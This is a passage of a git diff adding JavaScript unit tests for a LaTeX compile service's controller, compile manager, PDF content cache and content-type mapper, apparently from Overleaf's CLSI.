+    describe('successfully', function () {
+      beforeEach(function () {
+        this.CompileController.compile(this.req, this.res)
+      })
+
+      it('should parse the request', function () {
+        this.RequestParser.parse.calledWith(this.req.body).should.equal(true)
+      })
+
+      it('should run the compile for the specified project', function () {
+        this.CompileManager.doCompileWithLock
+          .calledWith(this.request_with_project_id)
+          .should.equal(true)
+      })
+
+      it('should mark the project as accessed', function () {
+        this.ProjectPersistenceManager.markProjectAsJustAccessed
+          .calledWith(this.project_id)
+          .should.equal(true)
+      })
+
+      it('should return the JSON response', function () {
+        this.res.status.calledWith(200).should.equal(true)
+        this.res.send
+          .calledWith({
+            compile: {
+              status: 'success',
+              error: null,
+              stats: this.stats,
+              timings: this.timings,
+              buildId: this.buildId,
+              outputUrlPrefix: '/zone/b',
+              outputFiles: this.output_files.map(file => ({
+                url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`,
+                ...file,
+              })),
+            },
+          })
+          .should.equal(true)
+      })
+    })
+
+    describe('without an outputUrlPrefix', function () {
+      beforeEach(function () {
+        this.Settings.apis.clsi.outputUrlPrefix = ''
+        this.CompileController.compile(this.req, this.res)
+      })
+
+      it('should return the JSON response with empty outputUrlPrefix', function () {
+        this.res.status.calledWith(200).should.equal(true)
+        this.res.send
+          .calledWith({
+            compile: {
+              status: 'success',
+              error: null,
+              stats: this.stats,
+              timings: this.timings,
+              buildId: this.buildId,
+              outputUrlPrefix: '',
+              outputFiles: this.output_files.map(file => ({
+                url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`,
+                ...file,
+              })),
+            },
+          })
+          .should.equal(true)
+      })
+    })
+
+    describe('with user provided fake_output.pdf', function () {
+      beforeEach(function () {
+        this.output_files = [
+          {
+            path: 'fake_output.pdf',
+            type: 'pdf',
+            build: 1234,
+          },
+          {
+            path: 'output.log',
+            type: 'log',
+            build: 1234,
+          },
+        ]
+        this.CompileManager.doCompileWithLock = sinon
+          .stub()
+          .callsFake((_req, stats, timings, cb) => {
+            Object.assign(stats, this.stats)
+            Object.assign(timings, this.timings)
+            cb(null, {
+              outputFiles: this.output_files,
+              buildId: this.buildId,
+            })
+          })
+        this.CompileController.compile(this.req, this.res)
+      })
+
+      it('should return the JSON response with status failure', function () {
+        this.res.status.calledWith(200).should.equal(true)
+        this.res.send.should.have.been.calledWith({
+          compile: {
+            status: 'failure',
+            error: null,
+            stats: this.stats,
+            timings: this.timings,
+            outputUrlPrefix: '/zone/b',
+            buildId: this.buildId,
+            outputFiles: this.output_files.map(file => ({
+              url: `${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`,
+              ...file,
+            })),
+          },
+        })
+      })
+    })
+
+    describe('with an empty output.pdf', function () {
+      beforeEach(function () {
+        this.output_files = [
+          {
+            path: 'output.pdf',
+            type: 'pdf',
+            size: 0,
+            build: 1234,
+          },
+          {
+            path: 'output.log',
+            type: 'log',
+            build: 1234,
+          },
+        ]
+        this.CompileManager.doCompileWithLock = sinon
+          .stub()
+          .callsFake((_req, stats, timings, cb) => {
+            Object.assign(stats, this.stats)
+            Object.assign(timings, this.timings)
+            cb(null, {
+              outputFiles: this.output_files,
+              buildId: this.buildId,
+            })
+          })
+        this.CompileController.compile(this.req, this.res)
+      })
+
+      it('should return the JSON response with status failure', function () {
+        this.res.status.calledWith(200).should.equal(true)
+        this.res.send.should.have.been.calledWith({
+          compile: {
+            status: 'failure',
+            error: null,
+            stats: this.stats,
+            buildId: this.buildId,
+            timings: this.timings,
+            outputUrlPrefix: '/zone/b',
+            outputFiles: this.output_files.map(file => ({
+              url:
`${this.Settings.apis.clsi.url}/project/${this.project_id}/build/${file.build}/output/${file.path}`, + ...file, + })), + }, + }) + }) + }) + + describe('with an error', function () { + beforeEach(function () { + const error = new Error((this.message = 'error message')) + error.buildId = this.buildId + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(error) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the error', function () { + this.res.status.calledWith(500).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'error', + error: this.message, + outputUrlPrefix: '/zone/b', + outputFiles: [], + buildId: this.buildId, + stats: this.stats, + timings: this.timings, + }, + }) + .should.equal(true) + }) + }) + + describe('with too many compile requests error', function () { + beforeEach(function () { + const error = new Errors.TooManyCompileRequestsError( + 'too many concurrent compile requests' + ) + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(error) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the error', function () { + this.res.status.calledWith(503).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'unavailable', + error: 'too many concurrent compile requests', + outputUrlPrefix: '/zone/b', + outputFiles: [], + stats: this.stats, + timings: this.timings, + // JSON.stringify will omit these undefined values + buildId: undefined, + }, + }) + .should.equal(true) + }) + }) + + describe('when the request times out', function () { + beforeEach(function () { + this.error = new Error((this.message = 'container timed out')) + this.error.timedout = true + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(this.error) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the timeout status', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send + .calledWith({ + compile: { + status: 'timedout', + error: this.message, + outputUrlPrefix: '/zone/b', + outputFiles: [], + stats: this.stats, + timings: this.timings, + // JSON.stringify will omit these undefined values + buildId: undefined, + }, + }) + .should.equal(true) + }) + }) + + describe('when the request returns no output files', function () { + beforeEach(function () { + this.CompileManager.doCompileWithLock = sinon + .stub() + .callsFake((_req, stats, timings, cb) => { + Object.assign(stats, this.stats) + Object.assign(timings, this.timings) + cb(null, {}) + }) + this.CompileController.compile(this.req, this.res) + }) + + it('should return the JSON response with the failure status', function () { + this.res.status.calledWith(200).should.equal(true) + this.res.send + .calledWith({ + compile: { + error: null, + status: 'failure', + outputUrlPrefix: '/zone/b', + outputFiles: [], + stats: this.stats, + timings: this.timings, + // JSON.stringify will omit these undefined values + buildId: undefined, + }, + }) + .should.equal(true) + }) + }) + }) + + describe('syncFromCode', function () { + beforeEach(function () { + 
this.file = 'main.tex' + this.line = 42 + this.column = 5 + this.project_id = 'mock-project-id' + this.req.params = { project_id: this.project_id } + this.req.query = { + file: this.file, + line: this.line.toString(), + column: this.column.toString(), + } + this.res.json = sinon.stub() + + this.CompileManager.syncFromCode = sinon + .stub() + .yields(null, (this.pdfPositions = ['mock-positions'])) + this.CompileController.syncFromCode(this.req, this.res, this.next) + }) + + it('should find the corresponding location in the PDF', function () { + this.CompileManager.syncFromCode + .calledWith( + this.project_id, + undefined, + this.file, + this.line, + this.column + ) + .should.equal(true) + }) + + it('should return the positions', function () { + this.res.json + .calledWith({ + pdf: this.pdfPositions, + }) + .should.equal(true) + }) + }) + + describe('syncFromPdf', function () { + beforeEach(function () { + this.page = 5 + this.h = 100.23 + this.v = 45.67 + this.project_id = 'mock-project-id' + this.req.params = { project_id: this.project_id } + this.req.query = { + page: this.page.toString(), + h: this.h.toString(), + v: this.v.toString(), + } + this.res.json = sinon.stub() + + this.CompileManager.syncFromPdf = sinon + .stub() + .yields(null, (this.codePositions = ['mock-positions'])) + this.CompileController.syncFromPdf(this.req, this.res, this.next) + }) + + it('should find the corresponding location in the code', function () { + this.CompileManager.syncFromPdf + .calledWith(this.project_id, undefined, this.page, this.h, this.v) + .should.equal(true) + }) + + it('should return the positions', function () { + this.res.json + .calledWith({ + code: this.codePositions, + }) + .should.equal(true) + }) + }) + + describe('wordcount', function () { + beforeEach(function () { + this.file = 'main.tex' + this.project_id = 'mock-project-id' + this.req.params = { project_id: this.project_id } + this.req.query = { + file: this.file, + image: (this.image = 'example.com/image'), + } + this.res.json = sinon.stub() + + this.CompileManager.wordcount = sinon + .stub() + .callsArgWith(4, null, (this.texcount = ['mock-texcount'])) + }) + + it('should return the word count of a file', function () { + this.CompileController.wordcount(this.req, this.res, this.next) + this.CompileManager.wordcount + .calledWith(this.project_id, undefined, this.file, this.image) + .should.equal(true) + }) + + it('should return the texcount info', function () { + this.CompileController.wordcount(this.req, this.res, this.next) + this.res.json + .calledWith({ + texcount: this.texcount, + }) + .should.equal(true) + }) + }) +}) diff --git a/services/clsi/test/unit/js/CompileManagerTests.js b/services/clsi/test/unit/js/CompileManagerTests.js new file mode 100644 index 0000000..33a43ae --- /dev/null +++ b/services/clsi/test/unit/js/CompileManagerTests.js @@ -0,0 +1,627 @@ +const Path = require('node:path') +const SandboxedModule = require('sandboxed-module') +const { expect } = require('chai') +const sinon = require('sinon') + +const MODULE_PATH = require('node:path').join( + __dirname, + '../../../app/js/CompileManager' +) + +describe('CompileManager', function () { + beforeEach(function () { + this.projectId = 'project-id-123' + this.userId = '1234' + this.resources = 'mock-resources' + this.outputFiles = [ + { + path: 'output.log', + type: 'log', + }, + { + path: 'output.pdf', + type: 'pdf', + }, + ] + this.buildFiles = [ + { + path: 'output.log', + type: 'log', + build: 1234, + }, + { + path: 'output.pdf', + type: 'pdf', + build: 
1234, + }, + ] + this.buildId = 'build-id-123' + this.commandOutput = 'Dummy output' + this.compileBaseDir = '/compile/dir' + this.outputBaseDir = '/output/dir' + this.compileDir = `${this.compileBaseDir}/${this.projectId}-${this.userId}` + this.outputDir = `${this.outputBaseDir}/${this.projectId}-${this.userId}` + + this.LatexRunner = { + promises: { + runLatex: sinon.stub().resolves({}), + }, + } + this.ResourceWriter = { + promises: { + syncResourcesToDisk: sinon.stub().resolves(this.resources), + }, + } + this.OutputFileFinder = { + promises: { + findOutputFiles: sinon.stub().resolves({ + outputFiles: this.outputFiles, + allEntries: this.outputFiles.map(f => f.path).concat(['main.tex']), + }), + }, + } + this.OutputCacheManager = { + promises: { + queueDirOperation: sinon.stub().callsArg(1), + saveOutputFiles: sinon + .stub() + .resolves({ outputFiles: this.buildFiles, buildId: this.buildId }), + }, + } + this.Settings = { + path: { + compilesDir: this.compileBaseDir, + outputDir: this.outputBaseDir, + synctexBaseDir: sinon.stub(), + }, + clsi: { + docker: { + image: 'SOMEIMAGE', + }, + }, + } + this.Settings.path.synctexBaseDir + .withArgs(`${this.projectId}-${this.userId}`) + .returns(this.compileDir) + this.child_process = { + exec: sinon.stub(), + execFile: sinon.stub().yields(), + } + this.CommandRunner = { + promises: { + run: sinon.stub().callsFake((_1, _2, _3, _4, _5, _6, compileGroup) => { + if (compileGroup === 'synctex') { + return Promise.resolve({ stdout: this.commandOutput }) + } else { + return Promise.resolve({ + stdout: 'Encoding: ascii\nWords in text: 2', + }) + } + }), + }, + } + this.DraftModeManager = { + promises: { + injectDraftMode: sinon.stub().resolves(), + }, + } + this.TikzManager = { + promises: { + checkMainFile: sinon.stub().resolves(false), + }, + } + this.lock = { + release: sinon.stub(), + } + this.LockManager = { + acquire: sinon.stub().returns(this.lock), + } + this.SynctexOutputParser = { + parseViewOutput: sinon.stub(), + parseEditOutput: sinon.stub(), + } + + this.dirStats = { + isDirectory: sinon.stub().returns(true), + } + this.fileStats = { + isFile: sinon.stub().returns(true), + } + this.fsPromises = { + lstat: sinon.stub(), + stat: sinon.stub(), + readFile: sinon.stub(), + mkdir: sinon.stub().resolves(), + rm: sinon.stub().resolves(), + unlink: sinon.stub().resolves(), + rmdir: sinon.stub().resolves(), + } + this.fsPromises.lstat.withArgs(this.compileDir).resolves(this.dirStats) + this.fsPromises.stat + .withArgs(Path.join(this.compileDir, 'output.synctex.gz')) + .resolves(this.fileStats) + + this.CompileManager = SandboxedModule.require(MODULE_PATH, { + requires: { + './LatexRunner': this.LatexRunner, + './ResourceWriter': this.ResourceWriter, + './OutputFileFinder': this.OutputFileFinder, + './OutputCacheManager': this.OutputCacheManager, + '@overleaf/settings': this.Settings, + '@overleaf/metrics': { + inc: sinon.stub(), + timing: sinon.stub(), + gauge: sinon.stub(), + Timer: sinon.stub().returns({ done: sinon.stub() }), + }, + child_process: this.child_process, + './CommandRunner': this.CommandRunner, + './DraftModeManager': this.DraftModeManager, + './TikzManager': this.TikzManager, + './LockManager': this.LockManager, + './SynctexOutputParser': this.SynctexOutputParser, + 'fs/promises': this.fsPromises, + './CLSICacheHandler': { + notifyCLSICacheAboutBuild: sinon.stub(), + downloadLatestCompileCache: sinon.stub().resolves(), + downloadOutputDotSynctexFromCompileCache: sinon.stub().resolves(), + }, + }, + }) + }) + + 
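+  // The tests below exercise the promise API. As a rough usage sketch,
+  // inferred from the stubs configured above (illustrative only, not code
+  // from the service itself):
+  //
+  //   const stats = {}
+  //   const timings = {}
+  //   const { outputFiles, buildId } =
+  //     await CompileManager.promises.doCompileWithLock(request, stats, timings)
+  //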
describe('doCompileWithLock', function () { + beforeEach(function () { + this.request = { + resources: this.resources, + rootResourcePath: (this.rootResourcePath = 'main.tex'), + project_id: this.projectId, + user_id: this.userId, + compiler: (this.compiler = 'pdflatex'), + timeout: (this.timeout = 42000), + imageName: (this.image = 'example.com/image'), + flags: (this.flags = ['-file-line-error']), + compileGroup: (this.compileGroup = 'compile-group'), + stopOnFirstError: false, + metricsOpts: { + path: 'clsi-perf', + method: 'minimal', + compile: 'initial', + }, + } + this.env = { + OVERLEAF_PROJECT_ID: this.projectId, + } + }) + + describe('when the project is locked', function () { + beforeEach(async function () { + const error = new Error('locked') + this.LockManager.acquire.throws(error) + await expect( + this.CompileManager.promises.doCompileWithLock(this.request, {}, {}) + ).to.be.rejectedWith(error) + }) + + it('should ensure that the compile directory exists', function () { + expect(this.fsPromises.mkdir).to.have.been.calledWith(this.compileDir, { + recursive: true, + }) + }) + + it('should not run LaTeX', function () { + expect(this.LatexRunner.promises.runLatex).not.to.have.been.called + }) + }) + + describe('normally', function () { + beforeEach(async function () { + this.result = await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should ensure that the compile directory exists', function () { + expect(this.fsPromises.mkdir).to.have.been.calledWith(this.compileDir, { + recursive: true, + }) + }) + + it('should write the resources to disk', function () { + expect( + this.ResourceWriter.promises.syncResourcesToDisk + ).to.have.been.calledWith(this.request, this.compileDir) + }) + + it('should run LaTeX', function () { + expect(this.LatexRunner.promises.runLatex).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + { + directory: this.compileDir, + mainFile: this.rootResourcePath, + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + flags: this.flags, + environment: this.env, + compileGroup: this.compileGroup, + stopOnFirstError: this.request.stopOnFirstError, + stats: sinon.match.object, + timings: sinon.match.object, + } + ) + }) + + it('should find the output files', function () { + expect( + this.OutputFileFinder.promises.findOutputFiles + ).to.have.been.calledWith(this.resources, this.compileDir) + }) + + it('should return the output files', function () { + expect(this.result.outputFiles).to.equal(this.buildFiles) + }) + + it('should not inject draft mode by default', function () { + expect(this.DraftModeManager.promises.injectDraftMode).not.to.have.been + .called + }) + }) + + describe('with draft mode', function () { + beforeEach(async function () { + this.request.draft = true + await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should inject the draft mode header', function () { + expect( + this.DraftModeManager.promises.injectDraftMode + ).to.have.been.calledWith(this.compileDir + '/' + this.rootResourcePath) + }) + }) + + describe('with a check option', function () { + beforeEach(async function () { + this.request.check = 'error' + await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should run chktex', function () { + expect(this.LatexRunner.promises.runLatex).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + { + directory: this.compileDir, + mainFile: this.rootResourcePath, + 
compiler: this.compiler, + timeout: this.timeout, + image: this.image, + flags: this.flags, + environment: { + CHKTEX_OPTIONS: '-nall -e9 -e10 -w15 -w16', + CHKTEX_EXIT_ON_ERROR: 1, + CHKTEX_ULIMIT_OPTIONS: '-t 5 -v 64000', + OVERLEAF_PROJECT_ID: this.projectId, + }, + compileGroup: this.compileGroup, + stopOnFirstError: this.request.stopOnFirstError, + stats: sinon.match.object, + timings: sinon.match.object, + } + ) + }) + }) + + describe('with a knitr file and check options', function () { + beforeEach(async function () { + this.request.rootResourcePath = 'main.Rtex' + this.request.check = 'error' + await this.CompileManager.promises.doCompileWithLock( + this.request, + {}, + {} + ) + }) + + it('should not run chktex', function () { + expect(this.LatexRunner.promises.runLatex).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + { + directory: this.compileDir, + mainFile: 'main.Rtex', + compiler: this.compiler, + timeout: this.timeout, + image: this.image, + flags: this.flags, + environment: this.env, + compileGroup: this.compileGroup, + stopOnFirstError: this.request.stopOnFirstError, + stats: sinon.match.object, + timings: sinon.match.object, + } + ) + }) + }) + + describe('when the compile times out', function () { + beforeEach(async function () { + const error = new Error('timed out!') + error.timedout = true + this.LatexRunner.promises.runLatex.rejects(error) + await expect( + this.CompileManager.promises.doCompileWithLock(this.request, {}, {}) + ).to.be.rejected + }) + + it('should clear the compile directory', function () { + for (const { path } of this.buildFiles) { + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/' + path + ) + } + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/main.tex' + ) + expect(this.fsPromises.rmdir).to.have.been.calledWith(this.compileDir) + }) + }) + + describe('when the compile is manually stopped', function () { + beforeEach(async function () { + const error = new Error('terminated!') + error.terminated = true + this.LatexRunner.promises.runLatex.rejects(error) + await expect( + this.CompileManager.promises.doCompileWithLock(this.request, {}, {}) + ).to.be.rejected + }) + + it('should clear the compile directory', function () { + for (const { path } of this.buildFiles) { + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/' + path + ) + } + expect(this.fsPromises.unlink).to.have.been.calledWith( + this.compileDir + '/main.tex' + ) + expect(this.fsPromises.rmdir).to.have.been.calledWith(this.compileDir) + }) + }) + }) + + describe('clearProject', function () { + it('should clear the compile directory', async function () { + await this.CompileManager.promises.clearProject( + this.projectId, + this.userId + ) + + expect(this.fsPromises.rm).to.have.been.calledWith(this.compileDir, { + force: true, + recursive: true, + }) + }) + }) + + describe('syncing', function () { + beforeEach(function () { + this.page = 1 + this.h = 42.23 + this.v = 87.56 + this.width = 100.01 + this.height = 234.56 + this.line = 5 + this.column = 3 + this.filename = 'main.tex' + }) + + describe('syncFromCode', function () { + beforeEach(function () { + this.records = [{ page: 1, h: 2, v: 3, width: 4, height: 5 }] + this.SynctexOutputParser.parseViewOutput + .withArgs(this.commandOutput) + .returns(this.records) + }) + + describe('normal case', function () { + beforeEach(async function () { + this.result = await this.CompileManager.promises.syncFromCode( + this.projectId, + 
this.userId, + this.filename, + this.line, + this.column, + '' + ) + }) + + it('should execute the synctex binary', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + const inputFilePath = `${this.compileDir}/${this.filename}` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'view', + '-i', + `${this.line}:${this.column}:${inputFilePath}`, + '-o', + outputFilePath, + ], + this.compileDir, + this.Settings.clsi.docker.image, + 60000, + {} + ) + }) + + it('should return the parsed output', function () { + expect(this.result).to.deep.equal(this.records) + }) + }) + + describe('with a custom imageName', function () { + const customImageName = 'foo/bar:tag-0' + beforeEach(async function () { + await this.CompileManager.promises.syncFromCode( + this.projectId, + this.userId, + this.filename, + this.line, + this.column, + { imageName: customImageName } + ) + }) + + it('should execute the synctex binary in a custom docker image', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + const inputFilePath = `${this.compileDir}/${this.filename}` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'view', + '-i', + `${this.line}:${this.column}:${inputFilePath}`, + '-o', + outputFilePath, + ], + this.compileDir, + customImageName, + 60000, + {} + ) + }) + }) + }) + + describe('syncFromPdf', function () { + beforeEach(function () { + this.records = [{ file: 'main.tex', line: 1, column: 1 }] + this.SynctexOutputParser.parseEditOutput + .withArgs(this.commandOutput, this.compileDir) + .returns(this.records) + }) + + describe('normal case', function () { + beforeEach(async function () { + this.result = await this.CompileManager.promises.syncFromPdf( + this.projectId, + this.userId, + this.page, + this.h, + this.v, + { imageName: '' } + ) + }) + + it('should execute the synctex binary', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'edit', + '-o', + `${this.page}:${this.h}:${this.v}:${outputFilePath}`, + ], + this.compileDir, + this.Settings.clsi.docker.image, + 60000, + {} + ) + }) + + it('should return the parsed output', function () { + expect(this.result).to.deep.equal(this.records) + }) + }) + + describe('with a custom imageName', function () { + const customImageName = 'foo/bar:tag-1' + beforeEach(async function () { + await this.CompileManager.promises.syncFromPdf( + this.projectId, + this.userId, + this.page, + this.h, + this.v, + { imageName: customImageName } + ) + }) + + it('should execute the synctex binary in a custom docker image', function () { + const outputFilePath = `${this.compileDir}/output.pdf` + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + [ + 'synctex', + 'edit', + '-o', + `${this.page}:${this.h}:${this.v}:${outputFilePath}`, + ], + this.compileDir, + customImageName, + 60000, + {} + ) + }) + }) + }) + }) + + describe('wordcount', function () { + beforeEach(async function () { + this.timeout = 60 * 1000 + this.filename = 'main.tex' + this.image = 'example.com/image' + + this.result = await this.CompileManager.promises.wordcount( + this.projectId, + this.userId, + this.filename, + this.image + ) + }) + + it('should run the texcount command', function () { + this.filePath = 
`$COMPILE_DIR/${this.filename}` + this.command = ['texcount', '-nocol', '-inc', this.filePath] + + expect(this.CommandRunner.promises.run).to.have.been.calledWith( + `${this.projectId}-${this.userId}`, + this.command, + this.compileDir, + this.image, + this.timeout, + {} + ) + }) + + it('should return the parsed output', function () { + expect(this.result).to.deep.equal({ + encode: 'ascii', + textWords: 2, + headWords: 0, + outside: 0, + headers: 0, + elements: 0, + mathInline: 0, + mathDisplay: 0, + errors: 0, + messages: '', + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ContentCacheManagerTests.js b/services/clsi/test/unit/js/ContentCacheManagerTests.js new file mode 100644 index 0000000..df3bce2 --- /dev/null +++ b/services/clsi/test/unit/js/ContentCacheManagerTests.js @@ -0,0 +1,223 @@ +const fs = require('node:fs') +const Path = require('node:path') +const { expect } = require('chai') + +const MODULE_PATH = '../../../app/js/ContentCacheManager' + +describe('ContentCacheManager', function () { + let contentDir, pdfPath, xrefPath + let ContentCacheManager, files, Settings + before(function () { + Settings = require('@overleaf/settings') + ContentCacheManager = require(MODULE_PATH) + }) + let contentRanges, newContentRanges, reclaimed + async function run(filePath, pdfSize, pdfCachingMinChunkSize) { + const result = await ContentCacheManager.promises.update({ + contentDir, + filePath, + pdfSize, + pdfCachingMinChunkSize, + compileTime: 1337, + }) + let newlyReclaimed + ;({ + contentRanges, + newContentRanges, + reclaimedSpace: newlyReclaimed, + } = result) + reclaimed += newlyReclaimed + + const fileNames = await fs.promises.readdir(contentDir) + files = {} + for (const fileName of fileNames) { + const path = Path.join(contentDir, fileName) + files[path] = await fs.promises.readFile(path) + } + } + before(function () { + contentDir = + '/overleaf/services/clsi/output/602cee6f6460fca0ba7921e6/content/1797a7f48f9-5abc1998509dea1f' + pdfPath = + '/overleaf/services/clsi/output/602cee6f6460fca0ba7921e6/generated-files/1797a7f48ea-8ac6805139f43351/output.pdf' + xrefPath = + '/overleaf/services/clsi/output/602cee6f6460fca0ba7921e6/generated-files/1797a7f48ea-8ac6805139f43351/output.pdfxref' + + reclaimed = 0 + Settings.pdfCachingMinChunkSize = 1024 + }) + + before(async function () { + await fs.promises.rm(contentDir, { recursive: true, force: true }) + await fs.promises.mkdir(contentDir, { recursive: true }) + await fs.promises.mkdir(Path.dirname(pdfPath), { recursive: true }) + }) + + describe('minimal', function () { + const PATH_MINIMAL_PDF = 'test/acceptance/fixtures/minimal.pdf' + const PATH_MINIMAL_XREF = 'test/acceptance/fixtures/minimal.pdfxref' + const OBJECT_ID_1 = '9 0 ' + const HASH_LARGE = + 'd7cfc73ad2fba4578a437517923e3714927bbf35e63ea88bd93c7a8076cf1fcd' + const OBJECT_ID_2 = '10 0 ' + const HASH_SMALL = + '896749b8343851b0dc385f71616916a7ba0434fcfb56d1fc7e27cd139eaa2f71' + function getChunkPath(hash) { + return Path.join('test/unit/js/snapshots/minimalCompile/chunks', hash) + } + let MINIMAL_SIZE, RANGE_1, RANGE_2, h1, h2, START_1, START_2, END_1, END_2 + before(async function () { + await fs.promises.copyFile(PATH_MINIMAL_PDF, pdfPath) + await fs.promises.copyFile(PATH_MINIMAL_XREF, xrefPath) + const MINIMAL = await fs.promises.readFile(PATH_MINIMAL_PDF) + MINIMAL_SIZE = (await fs.promises.stat(PATH_MINIMAL_PDF)).size + RANGE_1 = await fs.promises.readFile(getChunkPath(HASH_LARGE)) + RANGE_2 = await fs.promises.readFile(getChunkPath(HASH_SMALL)) + h1 = 
HASH_LARGE + h2 = HASH_SMALL + START_1 = MINIMAL.indexOf(RANGE_1) + END_1 = START_1 + RANGE_1.byteLength + START_2 = MINIMAL.indexOf(RANGE_2) + END_2 = START_2 + RANGE_2.byteLength + }) + async function runWithMinimal(pdfCachingMinChunkSize) { + await run(pdfPath, MINIMAL_SIZE, pdfCachingMinChunkSize) + } + + describe('with two ranges qualifying', function () { + before(async function () { + await runWithMinimal(500) + }) + it('should produce two ranges', function () { + expect(contentRanges).to.have.length(2) + }) + + it('should find the correct offsets', function () { + expect(contentRanges).to.deep.equal([ + { + objectId: OBJECT_ID_1, + start: START_1, + end: END_1, + hash: h1, + }, + { + objectId: OBJECT_ID_2, + start: START_2, + end: END_2, + hash: h2, + }, + ]) + }) + + it('should store the contents', function () { + expect(files).to.deep.equal({ + [Path.join(contentDir, h1)]: RANGE_1, + [Path.join(contentDir, h2)]: RANGE_2, + [Path.join(contentDir, '.state.v0.json')]: Buffer.from( + JSON.stringify({ + hashAge: [ + [h1, 0], + [h2, 0], + ], + hashSize: [ + [h1, RANGE_1.byteLength], + [h2, RANGE_2.byteLength], + ], + }) + ), + }) + }) + + it('should mark all ranges as new', function () { + expect(contentRanges).to.deep.equal(newContentRanges) + }) + + describe('when re-running with one range too small', function () { + before(async function () { + await runWithMinimal(1024) + }) + + it('should produce one range', function () { + expect(contentRanges).to.have.length(1) + }) + + it('should find the correct offsets', function () { + expect(contentRanges).to.deep.equal([ + { + objectId: OBJECT_ID_1, + start: START_1, + end: END_1, + hash: h1, + }, + ]) + }) + + it('should update the age of the 2nd range', function () { + expect(files).to.deep.equal({ + [Path.join(contentDir, h1)]: RANGE_1, + [Path.join(contentDir, h2)]: RANGE_2, + [Path.join(contentDir, '.state.v0.json')]: Buffer.from( + JSON.stringify({ + hashAge: [ + [h1, 0], + [h2, 1], + ], + hashSize: [ + [h1, RANGE_1.byteLength], + [h2, RANGE_2.byteLength], + ], + }) + ), + }) + }) + + it('should find no new ranges', function () { + expect(newContentRanges).to.deep.equal([]) + }) + + describe('when re-running 5 more times', function () { + for (let i = 0; i < 5; i++) { + before(async function () { + await runWithMinimal(1024) + }) + } + + it('should still produce one range', function () { + expect(contentRanges).to.have.length(1) + }) + + it('should still find the correct offsets', function () { + expect(contentRanges).to.deep.equal([ + { + objectId: OBJECT_ID_1, + start: START_1, + end: END_1, + hash: h1, + }, + ]) + }) + + it('should delete the 2nd range', function () { + expect(files).to.deep.equal({ + [Path.join(contentDir, h1)]: RANGE_1, + [Path.join(contentDir, '.state.v0.json')]: Buffer.from( + JSON.stringify({ + hashAge: [[h1, 0]], + hashSize: [[h1, RANGE_1.byteLength]], + }) + ), + }) + }) + + it('should find no new ranges', function () { + expect(newContentRanges).to.deep.equal([]) + }) + + it('should yield the reclaimed space', function () { + expect(reclaimed).to.equal(RANGE_2.byteLength) + }) + }) + }) + }) + }) +}) diff --git a/services/clsi/test/unit/js/ContentTypeMapperTests.js b/services/clsi/test/unit/js/ContentTypeMapperTests.js new file mode 100644 index 0000000..a413337 --- /dev/null +++ b/services/clsi/test/unit/js/ContentTypeMapperTests.js @@ -0,0 +1,79 @@ +/* eslint-disable + no-return-assign, + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. 
+// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/ContentTypeMapper' +) + +describe('ContentTypeMapper', function () { + beforeEach(function () { + return (this.ContentTypeMapper = SandboxedModule.require(modulePath)) + }) + + return describe('map', function () { + it('should map .txt to text/plain', function () { + const contentType = this.ContentTypeMapper.map('example.txt') + return contentType.should.equal('text/plain') + }) + + it('should map .csv to text/csv', function () { + const contentType = this.ContentTypeMapper.map('example.csv') + return contentType.should.equal('text/csv') + }) + + it('should map .pdf to application/pdf', function () { + const contentType = this.ContentTypeMapper.map('example.pdf') + return contentType.should.equal('application/pdf') + }) + + it('should fall back to octet-stream', function () { + const contentType = this.ContentTypeMapper.map('example.unknown') + return contentType.should.equal('application/octet-stream') + }) + + describe('coercing web files to plain text', function () { + it('should map .js to plain text', function () { + const contentType = this.ContentTypeMapper.map('example.js') + return contentType.should.equal('text/plain') + }) + + it('should map .html to plain text', function () { + const contentType = this.ContentTypeMapper.map('example.html') + return contentType.should.equal('text/plain') + }) + + return it('should map .css to plain text', function () { + const contentType = this.ContentTypeMapper.map('example.css') + return contentType.should.equal('text/plain') + }) + }) + + return 